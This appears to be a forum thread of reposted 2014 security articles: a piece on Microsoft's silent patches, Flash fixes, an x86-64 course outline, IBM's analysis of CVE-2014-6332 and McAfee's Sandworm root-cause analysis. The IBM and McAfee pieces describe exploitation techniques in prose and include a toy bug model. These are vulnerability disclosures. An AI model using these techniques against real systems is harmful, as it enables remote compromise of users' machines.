The main argument for why I'm wrong is that it would be possible for outsiders to reverse-engineer the differences between versions, as they are said to do in order to find the vulnerable code and write exploits for it, and they would then write exploits for the silently-patched vulnerabilities. But perhaps this actually happens all the time. (That's what I see as the main argument; please tell me why you think I'm wrong in the comments below.)

Of course I don't actually know that Microsoft is hiding secret security updates, but the alternatives aren't exactly flattering. It's especially odd to think that Microsoft doesn't hunt for security bugs in their own products when they do so in other companies'. Just yesterday, one of the many vulnerabilities fixed by Adobe in Flash Player (CVE-2014-8442) was reported by "Behrang Fouladi and Axel Souchet of Microsoft Vulnerability Research."

Over the last ten years or so Microsoft has gone to great lengths to gain credibility in security and I think they are generally respected in this regard. Why would they not acknowledge any internally-discovered vulnerabilities? Sounds incredible to me. Microsoft declined to comment.

Sursa: Microsoft's silent, secret security updates | ZDNet
-
Adobe fixes 18 vulnerabilities in Flash Player

By Lucian Constantin, IDG News Service | Nov 12, 2014 5:20 AM PT

Adobe Systems released critical security updates Tuesday for Flash Player to address 18 vulnerabilities, many of which can be remotely exploited to compromise underlying systems. Fifteen of the patched vulnerabilities can result in arbitrary code execution, one can be exploited to disclose session tokens and two allow attackers to escalate their privileges from the low to medium integrity level, Adobe said in a security advisory.

The company advises Windows and Mac users to update to the newly released Flash Player version 15.0.0.223. Linux users should update to Flash Player 11.2.202.418. The Flash Player Extended Support Release, which is based on Flash Player 13, was also updated, to version 13.0.0.252. The Flash Player plug-ins bundled with Google Chrome and Internet Explorer on Windows 8 and 8.1 will be upgraded automatically through those browsers' update mechanisms.

Adobe also released new versions of Adobe AIR, the company's runtime and software development kit (SDK) for rich Internet applications, because it bundles Flash Player. Users of the AIR desktop and Android runtime, as well as users of the AIR SDK and AIR SDK & Compiler, should update to version 15.0.0.356.

Many of the vulnerabilities patched in these new Flash Player releases were found and reported by researchers from Google, Microsoft, McAfee and Trend Micro. Adobe said via email that it is not aware of exploits for these vulnerabilities being used in the wild. However, as demonstrated last month, cybercriminals don't waste a lot of time before they start to attack newly patched Flash Player flaws.

Lucian Constantin — Romania Correspondent. Lucian Constantin writes about information security, privacy, and data protection for the IDG News Service.

Sursa: Adobe fixes 18 vulnerabilities in Flash Player | CSO Online
-
Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration

Creator: Xeno Kovah @XenoKovah
License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)

Class Prerequisites: Must have a basic understanding of the C programming language, as this class will show how C code corresponds to assembly code.

Lab Requirements: Requires a 64 bit Windows 7 system with Visual C++ 2012 Express Edition. Requires a 64 bit Linux system with gcc and gdb, and the CMU binary bomb installed. Either system can be physical or virtual.

Class Textbook: "Introduction to 64 Bit Assembly Programming for Linux and OS X: Third Edition" by Ray Seyfarth

Recommended Class Duration: 2 days

Creator Available to Teach In-Person Classes: Yes

Author Comments: Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. The final 25% of time will be spent learning Linux tools for analysis.

This class serves as a foundation for the follow-on Intermediate level x86 class. It teaches the basic concepts and describes the hardware that assembly code deals with. It also goes over many of the most common assembly instructions. Although x86 has hundreds of special purpose instructions, students will be shown it is possible to read most programs by knowing only around 20-30 instructions and their variations.
The instructor-led lab work will include:

* Stepping through a small program and watching the changes to the stack at each instruction (push, pop, call, ret (return), mov)
* Stepping through a slightly more complicated program (adds lea (load effective address), add, sub)
* Understanding the correspondence between C and assembly control transfer mechanisms (e.g. goto in C == jmp in asm)
* Understanding conditional control flow and how loops are translated from C to asm (conditional jumps, jge (jump greater than or equal), jle (jump less than or equal), ja (jump above), cmp (compare), test, etc.)
* Boolean logic (and, or, xor, not)
* Logical and arithmetic bit shift instructions and the cases where each would be used (shl (logical shift left), shr (logical shift right), sal (arithmetic shift left), sar (arithmetic shift right))
* Signed and unsigned multiplication and division
* Special one-instruction loops and how C functions like memset or memcpy can be implemented in one instruction plus setup (rep stos (repeat store to string), rep mov (repeat mov))
* Misc instructions like leave and nop (no operation)
* Running examples in the Visual Studio debugger on Windows and the Gnu Debugger (GDB) on Linux
* The famous "binary bomb" lab from the Carnegie Mellon University computer architecture class, which requires the student to do basic reverse engineering to progress through the different phases of the bomb, giving the correct input to avoid it "blowing up". This will be an independent activity.

Knowledge of this material is a prerequisite for future classes such as Intermediate x86, Rootkits, Exploits, and Introduction to Reverse Engineering. To submit any suggestions, corrections, or explanations of things I didn't know the reasons for, please email me at the address above.

Author Biography: Xeno has a BS in CS from UMN, and an MS in security from CMU, which he attended through the National Science Foundation Scholarship for Service (aka CyberCorps) program.
He has been attending security conferences since 1999, working full time on security research since 2007, and presenting at conferences since 2012. He is a little bit broke in the brain in that way that makes him feel the need to collect things. Most recently he has been collecting conference speaking credits. He has presented at BlackHat USA/EUR, IEEE S&P, ACM CCS, Defcon, CanSecWest, PacSec, Hack in the Box KUL, Microsoft BlueHat, Shmoocon, Hack.lu, NoSuchCon, SummerCon, ToorCon, DeepSec, VirusBulletin, MIRCon, AusCERT, Trusted Infrastructure Workshop, NIST NICE Workshop, DOD Information Assurance Symposium, and MTEM. His joint work has also been presented by his colleagues at Syscan, EkoParty, Hack in the Box AMS, Hack in Paris, Sec-T, SecTor, Source Boston, and Breakpoint/Ruxcon. Gotta collect ‘em all! (he says, as someone who is *not* of the Pokemon generation, but understands that particular form of psychological manipulation)

Class Materials

All Materials (.zip of .pptx (302 slides), pdf (manuals), Visual Studio (code) files)
All Materials (.zip of .key (302 slides), pdf (manuals), Visual Studio (code) files)
All Materials (.zip of .pdf (302 slides), pdf (manuals), Visual Studio (code) files)
Introduction (26 slides)
Refreshers (5 slides)
Architecture (19 slides)
The Stack (22 slides)
Example 1 (43 slides)
Local variables (15 slides)
Function parameter passing (14 slides)
Control flow (15 slides)
Boolean logic (9 slides)
Shifts (11 slides)
Multiply & divide (5 slides)
Rep Stos (9 slides)
Rep Movs (8 slides)
Assembly syntax (Intel vs. AT&T syntax) (4 slides)
Linux tools (21 slides)
Inline assembly & raw byte emitting (10 slides)
Read The Fun Manual!
(20 slides)
Variable length assembly instructions (3 slides)
Effects of compiler options (4 slides)
Bomb lab (6 slides)
Messing with disassemblers (7 slides)
Two's complement (6 slides)
Basic buffer overflow lab (12 slides)
Conclusion (8 slides)
Visual Studio Express 2012 code for labs
64 bit compiled copy of CMU Linux bomb lab ELF executable (originally from here)

Sursa: http://opensecuritytraining.info/IntroX86-64.html
-
IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows

By Robert Freeman • November 11, 2014

The IBM X-Force Research team has identified a significant data manipulation vulnerability (CVE-2014-6332) with a CVSS score of 9.3 in every version of Microsoft Windows from Windows 95 onward. We reported this issue with a working proof-of-concept exploit back in May 2014, and today, Microsoft is patching it. It has been remotely exploitable since Microsoft Internet Explorer (IE) 3.0. This complex vulnerability is a rare, “unicorn-like” bug found in code that IE relies on but doesn’t necessarily belong to. The bug can be used by an attacker for drive-by attacks to reliably run code remotely and take over the user’s machine — even sidestepping the Enhanced Protected Mode (EPM) sandbox in IE 11 as well as the highly regarded Enhanced Mitigation Experience Toolkit (EMET) anti-exploitation tool Microsoft offers for free.

What Does This Mean?

First, this means that significant vulnerabilities can go undetected for some time. In this case, the buggy code is at least 19 years old and has been remotely exploitable for the past 18 years. Looking at the original release code of Windows 95, the problem is present. With the release of IE 3.0, remote exploitation became possible because it introduced Visual Basic Script (VBScript). Other applications over the years may have used the buggy code, though the inclusion of VBScript in IE 3.0 makes it the most likely candidate for an attacker. In some respects, this vulnerability has been sitting in plain sight for a long time despite many other bugs being discovered and patched in the same Windows library (OleAut32).

Second, it indicates that there may be other bugs still to be discovered that relate more to arbitrary data manipulation than more conventional vulnerabilities such as buffer overflows and use-after-free issues.
These data manipulation vulnerabilities could lead to substantial exploitation scenarios, from the manipulation of data values to remote code execution. In fact, there may be multiple exploitation techniques that lead to possible remote code execution, as is the case with this particular bug. Typically, attackers use remote code execution to install malware, which may have any number of malicious actions, such as keylogging, screen-grabbing and remote access.

IBM X-Force has had product coverage with its network intrusion prevention system (IPS) since reporting this vulnerability back in May 2014, though X-Force hasn’t found any evidence of exploitation of this particular bug in the wild. I have no doubt that it would have fetched six figures on the gray market. The proof of concept IBM X-Force built uses a technique that other people have discovered, too. In fact, it was presented at this year’s Black Hat USA Conference.

Technical Description

In VBScript, array elements are actually Component Object Model (COM) SafeArrays. Each element is a fixed size of 16 bytes, with an initial WORD indicating the Variant type. Under normal circumstances, one will only have control of a maximum of 8 bytes of this data, through either the Variant type for double values or for currency values.

Array Elements: | Variant Type (WORD) | Padding (WORD) | Data High (DWORD) | Data Low (DWORD) |

Cutting to the chase, VBScript permits in-place resizing of arrays through the command “redim preserve.” This is where the vulnerability is.

redim preserve arrayname( newsizeinelements )

VBScript.dll contains a runtime evaluation method, CScriptRuntime::Run(VAR *), which farms out the SafeArray redimension task to OleAut32.dll with the SafeArrayRedim(...) function. Essentially, what happens is that fairly early on, SafeArrayRedim() will swap out the old array size (element count) with the resize request.
However, there is a code path where, if an error occurs, the size is not reset before returning to the calling function, VBScript!CScriptRuntime::Run(). For VBScript, exploitation of this bug could have been avoided by invalidating the common “On Error Resume Next” VBScript code when the OleAut32 library returns with an error. Since it doesn’t, one can simply rely on this statement to regain script execution and continue to use “corrupted” objects. This VBScript code snippet is extremely common, and its presence would not indicate that this vulnerability has been exploited.

Exploitation of Vulnerability

This is the fun part. Although the bug originates in some very old code within the OleAut32 library, I’m approaching exploitation from the perspective of VBScript within Internet Explorer because all versions since 3.0 are vulnerable through this vector. Exploitation is tricky, partially because array elements are a fixed size. Yet there are two additional issues that complicate exploitation. The first is that there is little opportunity to place arbitrary data where VBScript arrays are stored on the IE heap. The second issue is that, assuming you are now addressing outside the bounds of your VBScript array (SafeArray), you will find the unpleasant enforcement of Variant type compatibility matching.

In the end, the key to exploitation toward reliable code execution was to take advantage of the difference between the element alignment of the arrays (16 bytes) and the alignment of the Windows heap (8 bytes). This provides opportunities to change the Variant type in an element of an adjacent array and to read that content back through the original array reference. In short, with this kind of memory manipulation available, an attacker can do a number of things. One possibility is to create arbitrary dispatch pointers for VT_DISPATCH or VT_UNKNOWN types.
This can lead to Data Execution Prevention (DEP) firing if the specified pointer does not correspond to a memory address with execution enabled. There are ways around that, too, but I’ll return to that later. Another possibility would be to use this attack to grab some heap data, but that is a little inconvenient because, again, you run into Variant type compatibility matching. If the location outside of the array boundary that would hold the Variant type is not a known Variant ID or combination on a read operation, or if it is not directly compatible on a write operation, nothing further will happen.

However, again, one can abuse the Variant type of objects in the array. So if attackers start with a BSTR and create a Unicode representation of the data they want another type to point to, it can be used to create objects that can lead to more elaborate exploits. At the time I made the vulnerability discovery, I also happened to run across a blog post hinting that a combination of VT_ARRAY and VT_VARIANT could be useful in this respect. Massaging the data for the VT_VARIANT|VT_ARRAY object permits the use of any virtual address instead of being stuck with the relative addresses of the array boundaries we resized. Furthermore, as we are now dealing with an array of variants, we can use the vartype() command to obtain 16 bits of information from any address we specify. The reason for the 16 bits is just that COM variants max out at 16 bits of data. While we still have to deal with the variant compatibility enforcement, many exciting possibilities now exist.

One of these possibilities permits a data-only attack. The next step for this possibility leverages a memory leak leading to the VBScript class object instance. Content can be left behind in the array data that was never intended to be read. By again changing the variant type of an object in the adjacent array, we can read information that ends up being the pointer to the VBScript class object.
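Stepping back to the root cause for a moment, the bookkeeping failure in SafeArrayRedim() can be modeled in a few lines. This is a toy Python model of the size-versus-allocation desynchronization only, not of real memory layout or of the actual OleAut32 code:

```python
# Toy model: the element count is swapped to the new value early in the
# resize, and the error path returns without restoring it, leaving the
# script engine believing the array is larger than its real allocation.
class SafeArray:
    ELEMENT_SIZE = 16  # each VBScript array element is a 16-byte VARIANT

    def __init__(self, elements):
        self.count = elements
        self.buffer = bytearray(elements * self.ELEMENT_SIZE)

    def redim_preserve(self, new_count, fail=False):
        self.count = new_count      # size swapped in early...
        if fail:
            return 1                # ...but never restored on this path
        grown = bytearray(new_count * self.ELEMENT_SIZE)
        grown[:len(self.buffer)] = self.buffer  # "preserve" old contents
        self.buffer = grown
        return 0

arr = SafeArray(4)
arr.redim_preserve(1024, fail=True)  # error swallowed by On Error Resume Next
# The engine now indexes up to 1024 elements against a 4-element buffer:
assert arr.count * SafeArray.ELEMENT_SIZE > len(arr.buffer)
```

Every "element" the script touches past the fourth lands in adjacent heap memory, which is exactly what the adjacent-array Variant-type games above exploit.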
Coincidentally, multiple security researchers may have noticed that both JScript and VBScript from Microsoft check whether they are running in a safe mode, such as at the command prompt. This check looks at a member of the VBScript (or JScript) class object to see whether it is in this safe mode. Another happy coincidence is that not only can we reliably reach this location in memory using the address leak just discussed, but the nearby data in memory should always pass the Variant type compatibility test, permitting us to change the value and get code execution indirectly by running unsafe COM objects (think ActiveX) with arbitrary parameters. This is the same attack technique that Yang Yu presented at this year's Black Hat USA conference under the name "Vital Point Strike." Using this approach, which involves no shellcode or more exotic means such as return-oriented-programming gadgets, both the EPM sandbox in IE and Microsoft's EMET tool are bypassed.

Let's return to DEP for a moment. There are options here. For example, if there is any read+write+execute (+RWE) memory at a predictable location, we can manipulate objects to point to that memory. Similarly, we could create a large BSTR by pointing a BSTR at the +RWE memory and using the arbitrary write on top of null characters from the +RWE memory to set a large size. The hope is that we could do some in-place modifications with Unicode representations of shellcode. I haven't tested this, but it is an interesting idea. Subsequently, we could create arbitrary VT_DISPATCH or VT_UNKNOWN pointers that point back into the +RWE memory under our control. However, loading objects or plugins known to create +RWE by default is still a bit of a hassle.
If we have the ability to read arbitrary memory and create arbitrary VT_DISPATCH and VT_UNKNOWN pointers, and we have some ability to control data in memory (either ordinary heap data we can reach from our VBScript, or data we can touch and change because compatibility testing passes), we should have no trouble creating Windows API calls. This happens to be another method Yang presented, which he calls "Interdimensional Code Execution." In fact, using it to disable DEP is possible, but that is somewhat of a waste: a sledgehammer result from an elegant approach.

Hopefully, if you've made it this far, you have a pretty good idea of how powerful the data attacks facilitated by this bug can be. Our disclosure was originally submitted a number of months ago, and while the exploitation techniques described are not exclusive to us, they contribute well toward our goal of describing a significant vulnerability and how it was turned into a viable proof-of-concept attack for disclosure. We incorporated product coverage for the OLE vulnerability into our network IPS, and so far the signature we developed has not fired. However, for the attack techniques discussed, I think it is only a matter of time before we see them in the wild.

Sursa: IBM X-Force Researcher Finds Significant Vulnerability in Microsoft Windows
-
Bypassing Microsoft’s Patch for the Sandworm Zero Day: a Detailed Look at the Root Cause

By Haifei Li on Nov 11, 2014

On October 21, we warned the public that a new exploitation method could bypass Microsoft's official patch (MS14-060, KB3000869) for the infamous Sandworm zero-day vulnerability. As Microsoft has finally fixed the problem today via Security Bulletin MS14-064, it's time to uncover our findings and address some confusion. This is the first of two posts on this issue. (McAfee has already delivered various protections against this threat to our customers.)

Sandworm background

This zero-day attack was disclosed at almost the same time that the patch became available on the last "Patch Tuesday" (October 14). We found this to be a very serious zero-day attack, not only because the attack targeted many sensitive organizations (such as NATO), but also because of the technical properties of the vulnerability and its exploitation.

The vulnerability is a logic fault. It is not related to memory corruption (such as a heap-based overflow or use-after-free), so proven-effective exploitation mitigations such as ASLR and DEP on Windows 7 or later will fail to block the exploit. Nor can Microsoft's enhanced security tool, the Enhanced Mitigation Experience Toolkit (EMET), block the attack by default.

Though the in-the-wild samples are organized as PowerPoint Show (.ppsx) files, the flaw actually lies in the Windows Packager COM object (packager.dll). Considering that COM objects are OS-wide function providers that any application installed on the system can invoke, other formats can be attack paths as well. This means that all Windows users, not only Office users, are at risk. The attacks have been going on for quite a long time. For example, an exploit generator found on VirusTotal suggests that the vulnerability was discovered in June 2013.
Microsoft’s patch and two bypasses

On October 17, three days after its release, we found that Microsoft's patch could be bypassed with some tricks. We reported our findings to Microsoft the same day, which led to the emergency Security Advisory 3010060, released October 21 with a temporary "Fix It." We created a proof of concept (PoC) demonstrating the bypass. We later learned that some other parties, including the Google Security Team, had detected in-the-wild samples that are said to bypass the patch.

We analyzed some samples in the wild and found that they trigger a User Account Control (UAC) warning when one logs in with a standard nonadministrator account. However, users on an administrator account, or who have disabled UAC, will not see the warning, and the malicious code will execute automatically. Our PoC takes another path and does not trigger UAC at all. Thus our PoC is a full bypass, while the in-the-wild samples are a partial bypass.

At the root

The vulnerability exists in the Packager object. In fact, there are two issues rather than one. The first issue allows an attacker to drop an arbitrary file into the temp folder. (We warned the public about this security issue in a July post. Anyone who followed our advice at that time, preventing Office from invoking the Packager object, is immune to the Sandworm attack.) The second issue is the core of the matter: while the former allows only the writing of a file into the temp folder, the latter allows an attacker to "execute" the file from the temp folder. Let's take a closer look at how it works.

Looking at the slide definition XML file inside the .ppsx sample, we find something interesting at the following lines:

The "verb" definition in slide1.xml.

The Packager is an OLE object that supports embedding one file into another container application. As described on this MSDN page, OLE objects that provide embedding functions must expose the interface IOleObject.
For the preceding XML definition, this calls the DoVerb() method of this IOleObject. Another MSDN page provides the prototype of this method:

Prototype of the IOleObject::DoVerb() function.

And the following shows the location of the IOleObject interface and the DoVerb() function in packager.dll:

The IOleObject interface and the DoVerb() function in packager.dll.

The string "cmd=3" in slide1.xml suggests that the value of the first parameter (iVerb) is 3. Depending on the value of iVerb, IOleObject::DoVerb() switches to different code. Following is the REed code (source code reconstructed through reverse engineering) for the case when iVerb equals 3:

The REed code for handling iVerb=3 in the IOleObject::DoVerb() function.

With further research and testing, we realized that this code performs the same action as clicking the second item on the following menu after right-clicking the filename, as shown here. (The print in red is our addition.)

The "right-click" menu for a .inf file.

Reading the whole of IOleObject::DoVerb(), we see that depending on the value of iVerb, the code takes different paths. We split them into two situations.

For iVerb values greater than or equal to 3, the code performs the same action as clicking an item on the pop-up menu. As we see in the REed code, it subtracts the fixed value 2 from the iVerb value 3, giving 1, which represents the second item on the right-click menu. We can also invoke any command below "Install" on the menu by supplying a larger iVerb value. For example, to click the third item on the preceding menu, we can set iVerb=4 ("cmd=4") in the slide definition file.

For iVerb values less than 3, the program follows other code that we have not shown. These actions, such as performing the default action (iVerb=2) or renaming the display name of the Packager object (iVerb=1), are handled well from a security point of view.
We are focusing on the first situation: when the iVerb value is greater than or equal to 3, it will effectively click "Install" or a lower choice from the pop-up menu for the specific file. For a .inf file, the right-click menu will appear exactly as in our image on a default Windows setup. Thus, in this example, "InfDefaultInstall.exe" will execute and various bad things will happen.

In this post, we have introduced the case and explained the essence of the vulnerability. In the second part, we will discuss the MS14-060 patch, how to bypass it, and more. Watch this space for our next post.

Sursa: http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous